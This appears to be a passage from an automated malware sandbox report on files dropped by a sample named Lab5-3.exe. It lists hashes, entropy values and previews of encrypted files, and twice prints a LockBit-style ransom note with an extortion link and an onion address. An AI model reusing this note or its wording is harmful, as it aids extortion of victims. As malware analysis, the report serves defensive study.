                                                                                                          SHA-256:DC921D7D2F8E904616C360730E6EBE5C05008C50D60A8AAD58BA27DD0C3B0B2D
                                                                                                          SHA-512:A1C1BF196CE1C3B4D5D2FB7CDA8F3819043F21F8065A54C75626A15A032B3AB264AE69ED303FEA2CCEAFDCE0E6DFB287ABB0ED39A84C1E9C47559F1AE12D6112
                                                                                                          Malicious:false
                                                                                                          Preview:.\..-...9..B...`.O...n.e...... ..[.P...:o..2...E...h.......W2.......bVy.1..V..<.R.A....JA`..U.......d.jTI^.q..:9..9*_...$Q6zf....<4.0....I.[..,_V..3....\...]..f.f@:..8X.@.H....v.q.9jS....P,].+......M..f...2>9I.XE......-..}!LQ\../.>..[.I.5l.G....V..#.t..]....yI...I!.#.L...rh.'...3e`IK....|.b<...p.w..F>J...Jd..B.......C*3.Ek.QY.G.....d(W........!.$.z..!...BM..S.....m...@|..xl.;.....=.D.\.S3.F.l.....]T.0.s.E......aU.S........Y6....y{....c..W..L.Q.|.}....W.@P..7...+.3..pom..d0.HB..}..5.n.';H<z....w.gN.....}..w...1....^..*...Jb..lz......./S.d...g...H....<I..J.=z...v..g!..<&u..*....X.......".z[.;....m4....P4.....uX.#.La.}.....|O.....=./.EG.0+a.&t.v:.Gz..e8./..@u..+...O.r...h.).....Auh.f....,....iFe$*.S..y...S/.[..Di.i.......Z.... .?.s.%.........QiQ.bq)2....7....ca.o...P}..8.Vr\.JK..z...q~Bh80.hL.-.....M.5l^F.../{..}........3) .C+.j.X......{...s.)..:....z?..|2...OFl.......n..COs..70#\fD.u.\#.@..:........T....%%U..W^$*.5.W..k=......i.s.}.'...6.m{....0l.j.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4016
                                                                                                          Entropy (8bit):7.953958499522084
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:vqt/LVw9w1kvZf7vzQ/+TQGx0uKeY2ElUJ:4LVlWvZf7zQ/sj0Cb
                                                                                                          MD5:AB29813119B6B2A50DD5EE962DF3C8B3
                                                                                                          SHA1:F95C216496563CE95FF423D681F0B9089315B4F9
                                                                                                          SHA-256:7266E10211FFB2A4B93C72528DADCA51451128B35B9DB6B92FE09253BD2C90A3
                                                                                                          SHA-512:75935A0F2D7E30596D99ADFE0FDCA9EA02086A4C00AC5E28221E31CF9BBC95364615D15A294660A3D4193989E7D93DFA9ABC66A40902AA6D958D920C02DB2DEB
                                                                                                          Malicious:false
                                                                                                          Preview:...1....;...t^C..K&..;Y...)..t..#..)[.......T.usj%\{).^c..r.a89OZ.S.e...?Fs...B....|..<.*.O...m49......Aq..fnI..??8...U....:o...7...=...M.......?D...`P..&r....h|.;N.%..8.~J..~t.......9bG.nV.k.g!..2$.......Y.J.)7.nMS1.P.x?.&.*....V.M:.....c7..&V.2'...s.P.:Ll...J-$7.WRN.*.D5..<.D...?.Nx7V...;...50..v.0w.#.l|...9..|....hJ..0.].l._......<.....M?!...K...Q.+....s/wRn3.......k..4...+...5.....".5....GO.w.@.BS...3..E9A...4..v......@~A.T..M.........P....a..e.....Z.r.rQ/..?.2...b..@N...M.B...a.....B.........?...o...i..v*v.y[k?.........$..|.z.....}P^..R.....:....e.... ,.D...;...B..}...].g.+.S.8.N8....J.N54..v.........,...D....+Z_.`;.?zT6fh..h.u....f...H..Mu.a:.D..-E...;;.L......am....t.;.$.h\Yr._.X.....L...+.*.)..L..h.&u.......Z....>...b6..b.bZ.V.."...._vTV.TfU....HB..lYA4.<..-..;....h.v.n.Pp...U~J.p..2W.:B./[}.M...FU.b..r.3,V......c..~.+Dj..3e.]@....M....{.&.dG.s3lp....r.t.?....P{~|.;.);.. ....$..M........rE5x.;e..=..G.h>..................y...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6224
                                                                                                          Entropy (8bit):7.974574479129385
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:8tbj7BUxrOYsmMH/tM8xH5UdhZMCOzUrDHMgWDbr9nzYkgv8/Gx0uKeY2ElUJ:8tn+xrjsfH/G8d5QUQrDcHr9zYkgl0Cb
                                                                                                          MD5:7402E6DC92797A5F2BD3EBBAFFF8501A
                                                                                                          SHA1:2E926320C4875D82665726C6B7EB2F10BC1DBE0F
                                                                                                          SHA-256:827EBCB5AEFAD696D871FFDFE94CFE0CBC027822D95A78863926177B37D5B0F1
                                                                                                          SHA-512:22393859E556F6535CDFF02A9501A5DBD59A87AEA42603D98DF86D677F4152CB20E20EE321FDE8D352475C53F248FA33B217D0D8FD277A050DBF19688F7EFD46
                                                                                                          Malicious:false
                                                                                                          Preview:..y....`....'4....7..s..."@.+....%BA5.....wu.JK.G}...s....;(..z.:...8.o.....$....v.\..!.CW...8kP.t."v..*...,B..P~.......xL.3....}...D:..8h*...w...&...X..].?..<%..`DG.%.........&cF.~ ..$R./........*2..n/.!..o.....cd.../.?.Aw...%!.o}..vf.sM;1\-R.c>Z6G.h."5..X..Q...%co....|..%..}......iqH.\.P...g..@D..[=....4...W....6.A"#.i]....M.......K^.....,....+......u....[.R.s.E...'.)...[............cc..1...x..F..+.Dq.%M.{V....6..../|?...*.op._..X%R..J.........iWfN...bU.J.,.....3..x...9..?..+.\.b.........n...\V.@.#0qZB.?.!.W.+NCN&.0..Nj..).9.b... ...\YF.@...<n.........1eU..O......$.235...B:\^.A..-.Ja....6i.el..p......fI.~l"......"..r..gM........b2A..|On...w.D....l..G`yb.</;...n......W.F.g.,...s3.`.........a..n*..2..JQ.TQ..."..}.xF......Q?...)M..B..8K...O.]K.'...nIAu.w".e.t..t.......[......U$fq.8Q.mu..."c..q.S..x.....&H..M.!.J...j.T#..>$.@s_.@..O.1...h`.........)....X.=3=O...".I0V.....9.....*......t.....f...X......@x......w..l..\@................S...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.900986211110541
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:c1Tb3LD3vjKdmNcKhHfUTid3hBaUoSGFcmeykEdEElU92i:chb33x3iGx0uKeY2ElUJ
                                                                                                          MD5:A5D74DAC9B34CFD31C1492ACA9AE061C
                                                                                                          SHA1:90FB9729A0B10C45A54231CE5E43A641E608022F
                                                                                                          SHA-256:70F31A93D07E4D75C67AC3667E5B21E9402FA99D9E8035267503A2A6DFA1EAAC
                                                                                                          SHA-512:1E78845A17CB1BABF33965E639B30CA93BF951C96309CA3146DB0425658B7AA6CB82884F5C88CB7C4B0BFB623F4F7FBD53057FF5592894C0148130125095095C
                                                                                                          Malicious:false
                                                                                                          Preview:=.tg.<nu...4......r.*.w..qM.U...$.]...m(Q..4.]..z./*.l.$.3x .T...h.k-W..zY..Y`...I.....F...l.V{P..|;.i.4.FT.Qa.....<.\H...~.)j........s><..v...2/.MXh.Vh..>.G.w.2...^.6.....J.....I...t.D..",.....A.zg.$.~.9s8@..d..s4.;........'[...O....d.y3. ._......lw.$.SVE../U+S.}.C...?'y...E.u...G...e..C,-...4.....,.._DOU{.{.....R..........?.*..|3.\..*...f&.B.Y.2....+BZ.;.......O>A.....s..H...%.<G.._...q.s....R..QO...n.cw.P.....-..z....y..=.(.......P...N.N6...k..s.G..:>...V..&t..6B...j....E.h._...b..P.........M............3......q...b.~..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.903619433932016
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:WXdU8wGSidYWHfUTid3hBaUoSGFcmeykEdEElU92i:Sd0GS6gGx0uKeY2ElUJ
                                                                                                          MD5:1FC7C52F2988B3BAEB2596B85E0EBF88
                                                                                                          SHA1:CDACA39E760D14D668026270E35E35AA2CA381F0
                                                                                                          SHA-256:0BFDC08ECBF77F0A70DA1CBEB758D52B170D191ADAE6CC258560C1554172BD70
                                                                                                          SHA-512:83EA489F04917DB863A251497025F1359793C688E8CB1B45665E89C0E5429F9ECED6A327E928182FBD1785D9921E87E57202B573A9BA6C5AD1EF703E6C420A47
                                                                                                          Malicious:false
                                                                                                          Preview:.....~w..L..PS4;\....W..Gt..P.....O.....,..u.;...y_.`..1.!&..|.n....&.*...5.Z....8......+gg.k.).L......Q.b.^...3..%.t...Z..\....yb*.S$H....B{ ..'^..R..h.J...NX9..u...K.../VnM.G......+[!9.$Y...Z.h..v..U&Uy...t.b.......8(.W'(.vA..Wf.x.CTI/r.:.r.Q....A*.d..a............_|a..g.nkT...)...rVG..w.s.o...JC..z....[..&..=e..#.F6./.."..^N.rw. .bI...(.J..l..^W^T.......Ji.zs.l.... .n..}$s.W...f......f..*.....}gW3].m...6*...WT.^.....@.$..Q...{....i.ft.1...R.QCQ.$....02...xR1.m!........63.f...Cw..$.G...H.y........>......U./sM..$T}..!)..62..W......U.._Xs.............*0;....P=...v?...*M5k..\......>..4..]L\..........nA.~..]....A....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2560
                                                                                                          Entropy (8bit):7.930932076400149
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:zfpPRJE3pd18bsIPDEfdp0WWCKIzHfUTid3hBaUoSGFcmeykEdEElU92i:zfpb2KrDE1p0WNKIAGx0uKeY2ElUJ
                                                                                                          MD5:00F5D562636B729DD9335D717D34D32B
                                                                                                          SHA1:298D785307AFEDEAEFE7DD76F79E9D205EC30EF4
                                                                                                          SHA-256:735FDD4AB7EE17788912F6C2A8C3BDD159027EAD706B791702B45B673A481EB6
                                                                                                          SHA-512:36AA459BA95350084EA1A058CFC631F3507A0E7C4F18B6E3D5E37EA819E53338DAA867B5B056D2560506F93681DFA1883C1808F669EBA9D9939BB76BB5BDC660
                                                                                                          Malicious:false
                                                                                                          Preview:B.1pF....(.....J.z...I..3....Q@.D-..]....t...54.7. ....6.x0yYu....,....[./.....f.y..eA.@|.;...M~..o%a..,.fUd.S..[ma.9..=.Une....?p......T...g.CX.A.S.. q7...?.u@...c|....W...#.wI.......{...{....V]..>.e.p..A.$j.......3I..z..-....Y=.N.B.-.`...1B/.:..+....$#..J1..8.h...p....h..1C/`......&.[a..#h.{y.+..a.A.......o....1....#.T.."EW...'.....E.......I.\{J._...."A{Qdl...=q.7......u..0P.?..H...E.I.A.2t[U...`.I_-..},.....K..]...G.).C.^'..d1.....+..>.-m$d.edYE+J...W...;V.1+..x.F...`.B..#...iy.F!.L....|gs.J.|.........,<.....q..{.j.S....m......^..wF.&W.1..e....&}0@.z.U2..d.w.^.........T.F.Y.........XxX..r...t>.SL. ...b.49dY. .m.8.............(.....'..8....t..k..%0.6.........+..w.....@.R._G..4E..To..'p...I.T$4L.c:.M....i...B7%x;IA..c...G.Xj.L..M...67..K^...l......LCL(...+..\.Z.)D.e.)F.>....0A..qE...E.X)6<..;m.;).....E.P......0...R....W<.E.V..el........?...$....`G.$.DF.v.!N......$...-N..d..]...H.s....]..KE_.X.......e...m,..U^..B../...c..|/}.....`.zD.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3184
                                                                                                          Entropy (8bit):7.943943100892083
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:QxjU72KG+pjqPtRsqhmVFYfY8jQOw+fnTiwHfUTid3hBaUoSGFcmeykEdEElU92i:QOpjqP0imVFcZUSTi3Gx0uKeY2ElUJ
                                                                                                          MD5:5A622F47C1CD5D1E536881D2BF4436C8
                                                                                                          SHA1:DDBBE9E37B85F71963FA8C8DB5DB4DA781791977
                                                                                                          SHA-256:EB0EAAC91DD4D4350FDC183FD955B9F983CBA3C9CBF499C267BAFD299AE68671
                                                                                                          SHA-512:7B6E32EF27B4FD1D8D78F2CB2018D2674399D3979F14269181556C2D00EDCB9985B4775F6EAFD1E6185B55114E82884E1EE91ABB64EE25F25D5430968197E6B5
                                                                                                          Malicious:false
                                                                                                          Preview:.Ym.`i......`k5.....;.&b.....X}.Sv..s@..!Ui.....wz"wHnDm...:yM..V.o.[5q.=.7R..0.{.[....6.K.>l...+R.5.C.E1.B.#..1.I.2(.0-.....^."...hC.......*>W.....`......,$.Yv.+.Q<.Gq...^wk....,I.\.....d..A.WLOD.L.....{/...:..l.......D..=..S...^...R.g.........l.....Q 7K..).9qWq.'..'.~.&..7|...l1v~"C\J.%..S...~U..(...c..Y.v}....[#..o..)..].j.#{#.&}.S..<..o.1...............MA....S.X.. ..@&..'.Y.............V.8.k.<)."l.{?.uTT..........'.....E.%wx.W.2+........H.......I.Q..moq...+e.a..........*.e.q..baJ..Q.x.|.og,K....*.......).....SN.....,~..WJp........k...>.u..$.R.....%.....*.p.e@S..eN.t.`.VR...k.*.y..k...~q..>.P:..9N....T:.].'.....=.p..|.?&......\,..D..F......vx.+..xf?....<........D/..p.2....:^...f....|..,.]?8....N\.(U......._........Z..t.C...ZC...hD....]........E:.x/:W".w.y...q....N.?...../...y...x.....}....U.6..2.C0..f.m.M...5PE7v>..K.v!G......K.mf.e. .D5}<...y0+.N..e...nO+G:th=.z..0....Um..).)..G..eIm...>..."..o.....K....k...]o..5...SS.=......y...RI].
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2800
                                                                                                          Entropy (8bit):7.927970466270274
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:vuZ0JoWGlAllFH1UUxQvFP/nKHfUTid3hBaUoSGFcmeykEdEElU92i:k0JkglFH1UcQhnlGx0uKeY2ElUJ
                                                                                                          MD5:14865CCD99695A2CD32AEB8898BFDC67
                                                                                                          SHA1:1A5F8F08A99A5B792974ED1DE0E4F5ECECF6E137
                                                                                                          SHA-256:D063B91349F7A7EDC1C1594D457CB97A2716D3C3B29DEE4B42164FC99AEB0945
                                                                                                          SHA-512:937606A8B312CBA2D67C09DDE75D41F3EB98C3FD14EE19926E30692B88098324C2375E1D8708D933BCCF21339C2826961E5D87CAAEF95244A5BCF3D80979F4BA
                                                                                                          Malicious:false
                                                                                                          Preview:YvY...T.E...8G.'...-..@.=c.....D/.....q1.k..*F.].Z...c.{.K.c...I)Y.f.[}.c.....B.H..k...$l.lc?..$5IS.(..Gd....|....a.'..J..V...}M..8Y.o.3f.S.=0_r.-...>U..@r..DRL.b.......V......9.zB..3h.!.W..!U?z.R.,.3...u.......T..#.k.kV....I4.9xW>.......du.u*..&.......}o.w....H....$YT..j...........H263..Z.^@.r.P.....2......]........<w..<..Z..~.v..?....*.r.....\.k|m|Ud.o.U._..Cy...P.;..x...#..H..?.G..`...3'8...t.Z.....Wk.y..........<aw&.o...K..i.U.E(F......A...z..t..{..n0....@......y..-=.[ 1.F.......C..#Qn.....E.......:P..../..x.a5......5t.q....*\..J.Nj....Ht.m.11..=.n.....o~...crc..p.8.....lZ..?.....K6.Ca#O1.....|l...<..Q...9..L.C8}:...)f.OJ...Y@T...hAk..,......<d....l.|..<.Zdy...,...!.......v......vdn...].....~TJ;}.g..<.X.k.8;j...alh....,NE*..~._.C.@...Q..V...2..Cp.._....#....S.....]_..T[.._}....3W+.FH../.?-.....O.....D.,.K....B.$..t\.{.......F.<G...9&d...6y.......FD...4V?....0....@..."..@3.m0...a/,*{.ES.y...../.....r..S+M7e.v.....%...1....8.r.ag..=
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2384
                                                                                                          Entropy (8bit):7.9222258033416155
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:UXu57JiTPubERqgYj+aAvsMHfUTid3hBaUoSGFcmeykEdEElU92i:UXaK5qgQLGx0uKeY2ElUJ
                                                                                                          MD5:AAC4145E4B08FA6B0CE4541510A6DB59
                                                                                                          SHA1:93C55CDB21E4D605F96C070679A547F52954ED80
                                                                                                          SHA-256:EEFFEF243617721795FFA8639BBCB8C931C5091194F690BFD2D05FB03D31B9AC
                                                                                                          SHA-512:68CBCE13CFDE634ADAB79FFBC0F2471A02212C690D5B27083CE02A00AB3B3C8E64055B0E9642D29D5E4FCA8A7065D76E711F7138E75FF6C919CC93DB6C9DCA9A
                                                                                                          Malicious:false
                                                                                                          Preview:.*._....4...M. l.r.b .g.z)....=..j.]..#-.>2a..zpu7.pu..>D0'..L....@....]...I..2..N.Q*.RA.+.Y...,Q..wZ35.q.p....by.....,...j....Qf;U.0.....H.......E8. .x.`...|.g.(X.4.[.7...P.....\..l../.-.[.3Q.f.Y.'p.t.....9...p.K.R...Q.4=T...i...&.~R^a#.Pd....v..?.\.?V.W.b..,.Z...LF.P.Z;.G.!M7.$.lp.....T......u...b.-wx...ko2t.o.....I...Arm.v./.G.t..m!..=...N...N..F.7(X.....G.0jP.$n.0.z...`..Q>.....;....^..+..u....n.\7>..1..L...v~.....6t..-)../..W.Q3.|......._C..X3.TBQ...43~:P.UQ.......ONG.z,z..............DYO..0B#.!..3..U~.|y..M...a....S3............K.o.._....w....O.[`..c..RQ....x..E..&U.A.j(Y.S..r.....+..E.5^..>0.8......F..r.....u..A*...0.. .......^^).t.d.N&.r...n.s}}.5..2T.j.bp^.k.....F;..;...y.....FT....{...]M.....3....`?..Q....IBf...W.Id+..R[+...;h.5.C.z.qC.xZF..F.1.N....C...(...&..'F.mql[!~#.w.h&?4.......[(.cS.x./..K...Q..K.GJd......].......y.C..}.@.\......4kA.T..6..9WV......8..=S.j.b.,..z...\l....%F...@\.,.!@)..!.Tr...^.....~*1y.BR..B.3..Vj,.h.}
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3136
                                                                                                          Entropy (8bit):7.938948259362837
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Fba96+HAK8HvXN6lXGnmMM5oceuU0IDpKFK9U1OMa2HfUTid3hBaUoSGFcmeykEO:FbsOfKXm4HU3FP9COMaJGx0uKeY2ElUJ
                                                                                                          MD5:77112D88C536662318EB292F433E8649
                                                                                                          SHA1:14BA24978117697E1F0E448D583347A4DB6D31BD
                                                                                                          SHA-256:19B2611A1F63A8FF6E54BEEE329B9E073F14D9870750A4972226BC3EC95F5FB1
                                                                                                          SHA-512:9F8F178216DE8F5B42C39AFC639412224BCD9C4A0991826FC215F1C96FA6A01FE3BC241C5E92C3287CD88EA275ACC8B4751642DFAC1C277622E52825E250B6B4
                                                                                                          Malicious:false
                                                                                                          Preview:L.d......g.p.q......0...pQ.....@..7D~.kEo[......V..C....Y...8.IB.-.........v(gq.qck.p..'... .Y.N.........(.z...$........,=.........l...2...c..i.)L.K.2.A.F.^g.R]-S.3..<KP.]..O8`Z~........o...g.kr].N`.+...n..s.+.........2...h..r1U<.'j#...G+k..[.!.......C.T%`zC..K.a.b...7M..<.b...!.j.....dO.....}...._....P............J.,"..**....b..Je.....9........s...i=.g2.K4...D....... ].P..P..'...7.>.|v......p...+%.^...=.~...7G....8..$L..........v:e.`..2U.Tp.s...l....?I.Mk&.4.y4H..5..'... ....-..d..a.,I.....pAt.3..?PjWBV[......:a>.-7.t.B.g.L.H.@..7J.R.......F.b.V.v.lC1.e...sb~/qr...a...~ax.!h..L....U..P.......=..J...t-..........-..4....t4.0.....#.~v..Z.Hr +..g.cu..Q...l....,e..%...s_^.r:.f.-....mO..iI)...L...T.B.).$.......}..I<<.b..>.GBSe...GHY...=....m.iP%.^.r(..4j.?..$w.....4.^.0.w..},9..VC ..Q..j.OR@m.......X..;...0./.uE../..U......2......>'... ....!...P.[+'.-8^3........<P.<.vt./..-3D./"za.#.u.+...$.zD.p.]...S.{.q:.....5/.T./...s..KZ.....-5..{.>
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2928
                                                                                                          Entropy (8bit):7.934992675313988
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:xIjTRAZLklzXOIl5VckcqEdmH5lN+fFmD5bzhmWd1SsHfUTid3hBaUoSGFcmeykt:xIjTRAdklbOIl5qkDbH5YQlYWd0Gx0ut
                                                                                                          MD5:17FDF9E69A0B6C44C36043E4DFED5019
                                                                                                          SHA1:0D068E5F1285E3DBDA7EE890494B5DEBF97C72B7
                                                                                                          SHA-256:A76D88D7D66FC60EFA281696F8C5EDD5C698E8BF3B929654281C0591B1989611
                                                                                                          SHA-512:15B85E4C8B7B0190C9731DD90EED36140D67C48D0B04D5782C3D47252DD4F555EA4A419CBA6418330D581416CC609DDB4AB834B3D4056708604DB71E696CCADF
                                                                                                          Malicious:false
                                                                                                          Preview:.88%8HY.`d..F.7......r...Y...;.W....2c....=.....v.#.r..J..k5..........a.S.l.r.g.0...5......)q..-.ZJ..97q./D..R.R..PM"..F.*..I<...OW3.l.E..uE...NDZ`*(.T...S...pQ.u-ei.o.........BwI...i....!-.m...`y..'.<.....0.e..^....9u..g..c...Y........0.....o.<c).O.h.........+$.m.r.}.|..@.l..tMoc.0...R....q AAE..8...j...K.U<4....7..,'."5+B..A.R..l...Kl..K.*.D......n.Z..KR..K.\Z..~..o.l.>.,...b<..$....xDM...0........N.....j..#.]..a...I.{vN.O+.?...'.n.......7..N.c..._OC..P..{.5,Ls..UXcr...v...`R.(.9....vw...X#.2-...#..4.....c.m.Cf...Z.`.x....wH....0...\J...[Q.a.E&....R.tp..?.L.n.2.%klt%3....9.L. i....]:.2....{.>.g...Ozn0(z[..,.f...Ankm...X.....U.h9*..l..W9txS..?.iG..cY.......n9<.`.#..i...j..b3~=................?O.$A...\6.>.>I....M...C..+@Wu%P.....M.H....9Z\._O......,>MA....d.@.j....}....|...-~.<."..c=z`....3C......;..ZM....V#V..I.<...{.....z...vU...(.zU.Q....C.U.V._...sK....`......0...@........ ~.X#p..T.rt...+.e.^].;...2.wWF..._...6.e...#...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4256
                                                                                                          Entropy (8bit):7.957076988864722
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:865qD7hIFUHHbExpMCpHTeVbwB6OmkBGx0uKeY2ElUJ:86kRIC2dHToMBRmk60Cb
                                                                                                          MD5:819D4CD8CA715807104E433FE196D54A
                                                                                                          SHA1:A2A37B3E9A148252462ACF6DF72A57EA6E92676D
                                                                                                          SHA-256:0F5ECA764925A7CEFA0B2F6935A9DABC5562E60C23AF6E5435DF93006DD1B053
                                                                                                          SHA-512:7659B1E634C9E69CAF57CB2F63B349D4F498ED16156E37875A151413B3BB80DDD692DE7131A434710F2C453E71EBD5612519AD175A77BD4095001097D5212676
                                                                                                          Malicious:false
                                                                                                          Preview:Th..'.E=...*5.2.}s>....x6}.V-7...w.K..E.Z....E......s....g*.J....4Cgf.]XF....{.v..v..4Rkq.2...F.Y..O+]a.Q5.....n..p..O....)}T.y......gs..>....8R.!.n.:..q.5..j..'ZU.m9..'*...8....Gei...Y........|!......6.x^.|K...J*.....ZUDD.....c........-4...M..4%.*..}.)...qL.....o.....[..........c.F..Ch.:....`g.-..v.R.c.3....Q....i....L..#..Z..o. ..{D.i.....O.L......4^.."."..@R4..A..K..;.^.}9...~..VL.f..Nb7d.%@...tv.[..& X.@u.!..0d^G...I....?.7..l...8.Z.%........X..B.OU.I..l.j!.w..^2.A.D..$....K.Z....2.N.Qt...'../.4..~\....|...0.......D......Y[X.I.....&...X...Fwt..|...>..W....Lp5.HG7<w...y%..St....O.-S...v..q-.(...4K.R8.%PS.......O...4..CZ.1.{..I.e@M.)......S5F.#..H.0zdQx.U.`J .L1..G.&..I....X.P...>.sO...`..*.....QPY.3.x.~.*....a...Z..}..rB....z2.......W.y%...........!....v$u1.........l+..z......|....O...T...z^G..[..&..n.R.b../..v.r.....v^-u..}=...e...\.8.................g.#oH3.>.z..f...,.{.O*..0+.&>...?...+.Q9+....Xbl.;.&.`.....s=.g.*..#..!.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:true
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:true
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18096
                                                                                                          Entropy (8bit):7.989406942725464
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:KxGeURJeoCHDe4qJYkS3ei3pJjnQsbkTgqiFhVKi7o1Ip4tb:O/URJDCHdvtdjnQtgrRp7p4Z
                                                                                                          MD5:5A72C7DD0F81BBEA045C076C1992A7F4
                                                                                                          SHA1:E17CA876C33F67885C6B81743DF57EEB4FDAA325
                                                                                                          SHA-256:4DED5ED2F4E94F384BBD625EC74C8E534AE9CD8B29D33BC2C3BC253B391E518B
                                                                                                          SHA-512:0B1B841972FB19C899EF23E779DDA50FA4417646A90C17F53AADEA2EF20D43FCD3283E55929B15AFD274130177A80D0D59A923FF75BC36738B9CB3DFC003CB82
                                                                                                          Malicious:false
